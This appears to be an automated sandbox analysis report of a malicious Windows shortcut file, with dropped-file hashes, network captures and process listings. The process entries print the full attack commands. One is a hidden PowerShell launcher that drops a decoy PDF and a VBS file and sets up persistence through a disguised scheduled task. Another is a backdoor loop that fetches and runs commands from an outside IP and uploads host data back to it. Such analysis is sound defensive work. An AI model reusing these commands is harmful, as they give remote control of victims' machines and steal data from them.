                                                                      Category:dropped
                                                                      Size (bytes):17772
                                                                      Entropy (8bit):7.653670822998931
                                                                      Encrypted:false
                                                                      SSDEEP:192:DVkkw6D71gBGmM2KMDUyoSvKGTzBvOZ9TJJxzIMDxjvK0S9YaAt86zgjIL1rJs9L:DVkkn/WC8KGBshzrvKx6UjMnT62Dk
                                                                      MD5:E762F98EBF5E28324CCC2FA4BA4FC3BB
                                                                      SHA1:EFF5094BB9056A44FE39CCFE4C480CAAD61F8096
                                                                      SHA-256:53812D7BDAF5E8E5C1B99B4B9F3D8D3D7726D4C6C23A72FB109132D96CA725C2
                                                                      SHA-512:2185C0794426D3A430E5F90FD83ECD0BFB00705B6856819B71CF02A94DDA47D63BA798FEC83ABBB1F7883C267EE2976917E13896F3B70B0ABFD262E400AA9060
                                                                      Malicious:false
                                                                      Preview:%PDF-1.4.%......1 0 obj.<< ./Creator (Canon iR-ADV 6555 PDF)./CreationDate (D:20230213085957+01'00')./Producer (\376\377\000A\000d\000o\000b\000e\000 \000P\000S\000L\000 \0001\000.\000\.3\000e\000 \000f\000o\000r\000 \000C\000a\000n\000o\000n\000\000).>> .endobj.2 0 obj.<< ./Pages 3 0 R ./Type /Catalog ./OutputIntents 12 0 R ./Metadata 13 0 R .>> .endobj.4 0 obj.<< /Type /XObject /Subtype /Image /Width 1240 /Height 1753 /BitsPerComponent 8 ./ColorSpace /DeviceGray /Filter [ /FlateDecode /DCTDecode ] /Length 21881 >> .stream..x..=w@S...j..Z..j.[.....hQI....&....n...*HH.u....".........DQD...." ".a..;..,B.._...>...{.9.w.}..1.3....>..!D...n..p.....GQW/&......~...>j.Qcl....dc3i.?.M........../:...{..~ngg........nEuwuC...u:...]...>...~.......G t_%...}>......}.}.Q....|..2>#|.o.......~.....}......7.~4.....k..~?xl..i....E..L\.n..._|...a......ml...n.......N.w.9....Z.d..+|V....q....m.l.s.n.7....y(*........z...a...s./\.r5.Z.....%.w...P..i.......-........W....o.P.:TM.n
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):98682
                                                                      Entropy (8bit):6.445287254681573
                                                                      Encrypted:false
                                                                      SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                      MD5:7113425405A05E110DC458BBF93F608A
                                                                      SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                      SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                      SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                      Malicious:false
                                                                      Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):737
                                                                      Entropy (8bit):7.501268097735403
                                                                      Encrypted:false
                                                                      SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                      MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                      SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                      SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                      SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                      Malicious:false
                                                                      Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):14456
                                                                      Entropy (8bit):4.2098179599164975
                                                                      Encrypted:false
                                                                      SSDEEP:192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ
                                                                      MD5:32FCA302C8B872738373D7CCB1E75FD4
                                                                      SHA1:DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1
                                                                      SHA-256:CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6
                                                                      SHA-512:57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F
                                                                      Malicious:false
                                                                      Preview:%PPKLITE-2.1.%......1 0 obj.<</PPK<</AddressBook<</Entries[2 0 R 3 0 R 4 0 R 5 0 R 6 0 R]/NextID 1006/Type/AddressBook>>/Type/PPK/User<</Type/User>>/V 65537>>/Type/Catalog>>.endobj.2 0 obj.<</ABEType 1/Cert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
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5377
                                                                      Entropy (8bit):3.4479656277646944
                                                                      Encrypted:false
                                                                      SSDEEP:48:zVfS+VxEEx8dE8Wk5m9wglzQSogZo5E5m9wglIQSogZod1:zwmxsV35m9wg/H55m9wgOHa
                                                                      MD5:BB1FF3DE74731B4D526B0F87824B2C55
                                                                      SHA1:F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9
                                                                      SHA-256:5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
                                                                      SHA-512:ECC46FD098A44D37CBB4141607E93C1C0D8BB0CB93566DC95B644C4051C981D995AD74E041B94D1F3D36C7A89D1478782E12B2D47E812C8FF74CC084C7B53F52
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...o..m....^q.h>...X..h>...D............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........o....^q.h>.....j.2.D...>Y&m .140AEC~1.LNK..N......DW.r>Y&m..............................1.4.0.A.E.c.u.V.y.7...l.n.k.......U...............-.......T.............I_.....C:\Users\user\Desktop\140AEcuVy7.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e..................................................................................................................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5377
                                                                      Entropy (8bit):3.4479656277646944
                                                                      Encrypted:false
                                                                      SSDEEP:48:zVfS+VxEEx8dE8Wk5m9wglzQSogZo5E5m9wglIQSogZod1:zwmxsV35m9wg/H55m9wgOHa
                                                                      MD5:BB1FF3DE74731B4D526B0F87824B2C55
                                                                      SHA1:F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9
                                                                      SHA-256:5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
                                                                      SHA-512:ECC46FD098A44D37CBB4141607E93C1C0D8BB0CB93566DC95B644C4051C981D995AD74E041B94D1F3D36C7A89D1478782E12B2D47E812C8FF74CC084C7B53F52
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...o..m....^q.h>...X..h>...D............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........o....^q.h>.....j.2.D...>Y&m .140AEC~1.LNK..N......DW.r>Y&m..............................1.4.0.A.E.c.u.V.y.7...l.n.k.......U...............-.......T.............I_.....C:\Users\user\Desktop\140AEcuVy7.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e..................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Nov 30 07:52:33 2023, mtime=Thu Nov 30 07:52:33 2023, atime=Thu Nov 30 07:52:33 2023, length=0, window=hide
                                                                      Entropy (8bit):5.972732311180514
                                                                      TrID:
                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                      File name:140AEcuVy7.lnk
                                                                      File size:25'631 bytes
                                                                      MD5:64752d058e5829210a0f407fb912c9d3
                                                                      SHA1:4e8a0cfb784a6f93f8974b4f11679786cef86bb7
                                                                      SHA256:0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
                                                                      SHA512:a383cfcaf25dababb76273ec0802867e1e74d2bcf4640eee855714b4c7c74e61145c6510668327dee053d904ed9d5cb4c5bfc3a8149f992ffdcb2cc7a96f1904
                                                                      SSDEEP:768:dPeFfZZEwj8l3fLSjDcljohJ8AtHMDjr4LunAX:dPUX8l2aFA1MDjrPU
                                                                      TLSH:5BB2CF9BFC923D5CF3D84EB722A7EC022AA43C2F15874560E645719948903BE3DB4D2E
                                                                      File Content Preview:L..................Fe...........j#......j#......j#...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe..........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.
                                                                      Icon Hash:dce4d4c4ccc9c96d

                                                                      General

                                                                      Relative Path:
                                                                      Command Line Argument:-w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='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';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f;
                                                                      Icon location:C:\program files\windows nt\accessories\wordpad.exe
                                                                      Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                                                      Sep 30, 2024 15:41:27.098285913 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.098323107 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.098588943 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.098589897 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.098617077 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.691523075 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.691982031 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.692003012 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.693058968 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.693123102 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.695184946 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.695255995 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.695478916 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.695487976 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.735791922 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.801270008 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801342964 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801788092 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.801808119 CEST  443          49716      23.41.168.139  192.168.2.5
                                                                      Sep 30, 2024 15:41:27.801829100 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:41:27.801873922 CEST  49716        443        192.168.2.5    23.41.168.139
                                                                      Sep 30, 2024 15:42:45.401952982 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:42:45.407058954 CEST  43820        58056      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:42:45.407752037 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:42:45.408137083 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:42:45.413033009 CEST  43820        58056      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:06.816231012 CEST  43820        58056      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:06.816327095 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:06.962104082 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:06.967078924 CEST  58057        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:07.062800884 CEST  43820        58056      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:07.062932014 CEST  58056        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:07.064318895 CEST  43820        58056      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:07.064337015 CEST  43820        58057      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:07.064436913 CEST  58057        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:07.064573050 CEST  58057        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:07.069535017 CEST  43820        58057      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:28.453514099 CEST  43820        58057      2.59.222.98    192.168.2.5
                                                                      Sep 30, 2024 15:43:28.453769922 CEST  58057        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:28.453907013 CEST  58057        43820      192.168.2.5    2.59.222.98
                                                                      Sep 30, 2024 15:43:28.458697081 CEST  43820        58057      2.59.222.98    192.168.2.5
                                                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                                                      Sep 30, 2024 15:41:26.672251940 CEST  58678        53         192.168.2.5  1.1.1.1
                                                                      Sep 30, 2024 15:41:32.852863073 CEST  53           64283      1.1.1.1      192.168.2.5
                                                                      Sep 30, 2024 15:41:42.661976099 CEST  53           56542      1.1.1.1      192.168.2.5
                                                                      Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
                                                                      Sep 30, 2024 15:41:26.672251940 CEST  192.168.2.5  1.1.1.1  0xf16f    Standard query (0)  x1.i.lencr.org  A (IP address)  IN (0x0001)  false
                                                                      Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                         CName                                    Address          Type                    Class        DNS over HTTPS
                                                                      Sep 30, 2024 15:41:26.680140972 CEST  1.1.1.1    192.168.2.5  0xf16f    No error (0)  x1.i.lencr.org               crl.root-x1.letsencrypt.org.edgekey.net                   CNAME (Canonical name)  IN (0x0001)  false
                                                                      Sep 30, 2024 15:41:27.398366928 CEST  1.1.1.1    192.168.2.5  0x8e5b    No error (0)  bg.microsoft.map.fastly.net                                           199.232.214.172  A (IP address)          IN (0x0001)  false
                                                                      Sep 30, 2024 15:41:27.398366928 CEST  1.1.1.1    192.168.2.5  0x8e5b    No error (0)  bg.microsoft.map.fastly.net                                           199.232.210.172  A (IP address)          IN (0x0001)  false
                                                                      • armmf.adobe.com
                                                                      • 2.59.222.98:43820
                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                      0           192.168.2.5  58056        2.59.222.98     43820             7332  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                      Sep 30, 2024 15:42:45.408137083 CEST  103                OUT        GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1
                                                                      Host: 2.59.222.98:43820
                                                                      Connection: Keep-Alive


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                      1           192.168.2.5  58057        2.59.222.98     43820             7332  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp                             Bytes transferred  Direction  Data
                                                                      Sep 30, 2024 15:43:07.064573050 CEST  103                OUT        GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1
                                                                      Host: 2.59.222.98:43820
                                                                      Connection: Keep-Alive


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                      0           192.168.2.5  49716        23.41.168.139   443               7672  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                      2024-09-30 13:41:27 UTC  475                OUT        GET /onboarding/smskillreader.txt HTTP/1.1
                                                                      Host: armmf.adobe.com
                                                                      Connection: keep-alive
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      If-None-Match: "78-5faa31cce96da"
                                                                      If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                      2024-09-30 13:41:27 UTC  198                IN         HTTP/1.1 304 Not Modified
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                      ETag: "78-5faa31cce96da"
                                                                      Date: Mon, 30 Sep 2024 13:41:27 GMT
                                                                      Connection: close


                                                                      Target ID:0
                                                                      Start time:09:41:10
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='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';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Recorded.vbs -value $c;schtasks.exe /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f;
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:09:41:10
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:41:12
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
                                                                      Imagebase:0x7ff686a00000
                                                                      File size:5'641'176 bytes
                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:09:41:12
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f
                                                                      Imagebase:0x7ff763e70000
                                                                      File size:235'008 bytes
                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:09:41:13
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
                                                                      Imagebase:0x7ff635960000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:09:41:14
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:09:41:14
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                      Imagebase:0x7ff6413e0000
                                                                      File size:3'581'912 bytes
                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:09:41:15
                                                                      Start date:30/09/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7e52b0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
